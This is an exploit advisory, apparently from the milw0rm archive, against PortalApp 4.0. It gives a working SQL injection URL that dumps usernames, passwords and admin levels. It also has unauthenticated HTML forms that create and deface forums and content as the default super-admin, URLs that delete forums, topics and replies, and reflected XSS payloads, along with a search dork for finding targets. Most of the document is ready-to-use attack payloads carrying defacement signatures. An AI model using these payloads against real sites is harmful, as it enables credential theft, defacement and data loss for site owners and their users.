116 lines
No EOL
6 KiB
Text
116 lines
No EOL
6 KiB
Text
##############################################################################
|
|
#Title: PortalApp 4.0 Multiple vulnerabilities #
|
|
# #
|
|
#Discovered By: r3dm0v3 #
|
|
# http://r3dm0v3.persianblog.ir #
|
|
# r3dm0v3( 4t }yahoo[dot}com #
|
|
# Tehran - Iran #
|
|
# #
|
|
#Vendor: http://www.portalapp.com #
|
|
#Vulnerable Version: 4.0, prior versions maybe vulnerable #
|
|
#Remote Exploit: Yes #
|
|
#Dork: "Copyright @2007 Iatek LLC" #
|
|
#Fix: Not Available #
|
|
##############################################################################
|
|
|
|
##############################################################################
|
|
# SQL Injection (CRITICAL) #
|
|
##############################################################################
|
|
#Description:
|
|
PortalApp is a Content Management System (CMS) for websites.
|
|
Bug: The user input 'sortby' is directly used in query statement!
|
|
|
|
#Exploit:
|
|
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users
|
|
|
|
author will be usernames
|
|
topic will be passwords
|
|
replies will be username IDs
|
|
views will be access levels (5 is super admin)
|
|
|
|
|
|
##############################################################################
|
|
# Following actions in 'forum.asp' can take done without any authentication. #
|
|
##############################################################################
|
|
create a forum:
|
|
<html>
|
|
<form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post>
|
|
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
|
|
ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
|
|
Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
|
|
ForumSection:<input type=text name=ForumSection value="Hacked"><br>
|
|
DisplayOrder:<input type=text name=DisplayOrder value=1><br>
|
|
<input type=submit>
|
|
</form>
|
|
</html>
|
|
|
|
create a topic:
|
|
<html>
|
|
<form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post>
|
|
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
|
|
ForumID:<input type=text name=ForumId value=><br>
|
|
Subject:<input type=text name=Subject value="r3dm0v3."><br>
|
|
Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br>
|
|
Icon:<input type=text name=Icon value=14><br>
|
|
Show Signature:<input type=text name=Showsignature value=0><br>
|
|
Notify:<input type=text name=Notify ><br>
|
|
Locked:<input type=text name=Locked value=1><br>
|
|
Sticky:<input type=text name=Sticky ><br>
|
|
Date:<input type=text name=DateAdded value="6/1/2008"><br>
|
|
DateLast:<input type=text name=DateLast value="6/1/2008"><br>
|
|
<input type=submit>
|
|
</form>
|
|
</html>
|
|
|
|
delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
|
|
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
|
|
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
|
|
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]
|
|
|
|
#There some other actions:
|
|
insert_level3_edit_disc_replies
|
|
insert_detail_disc_topics
|
|
update_level1_edit_disc_forums
|
|
update_level2_edit_disc_topics
|
|
update_level3_edit_disc_replies
|
|
update_detail_disc_topics
|
|
update_level2_disc_replies
|
|
|
|
|
|
##############################################################################
|
|
#Following actions in 'Content.asp' can take done without any authentication.#
|
|
##############################################################################
|
|
Add content:
|
|
<html>
|
|
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
|
|
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
|
|
ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
|
|
catID:<input type=text name=CatID value=198><br>
|
|
Date:<input type=text name=DateAdded value="6/1/2008"><br>
|
|
Author:<input type=text name=Author value=r3dm0v3><br>
|
|
title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
|
|
ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br>
|
|
LongDesc:<br><textarea rows=4 cols=50 name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br>
|
|
relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
|
|
DownloadURL:<input type=text name=DownloadURL><br>
|
|
Filename:<input type=text name=Filename><br>
|
|
Thumbnail:<input type=text name=Thumbnail><br>
|
|
Image1:<input type=text name=Image1><br>
|
|
PrevContentID:<input type=text name=PrevContentId><br>
|
|
NextContentID:<input type=text name=NextContentId><br>
|
|
views:<input type=text name=Impressions value=10000><br>
|
|
AVGRating:<input type=text name=AvgRating value=10000><br>
|
|
<input type=submit>
|
|
</form>
|
|
</html>
|
|
|
|
'insert_detail_content' is also vulnerable. Use above html code for exploit
|
|
|
|
|
|
##############################################################################
|
|
# XSS #
|
|
##############################################################################
|
|
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
|
|
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
|
|
|
|
# milw0rm.com [2008-01-06] |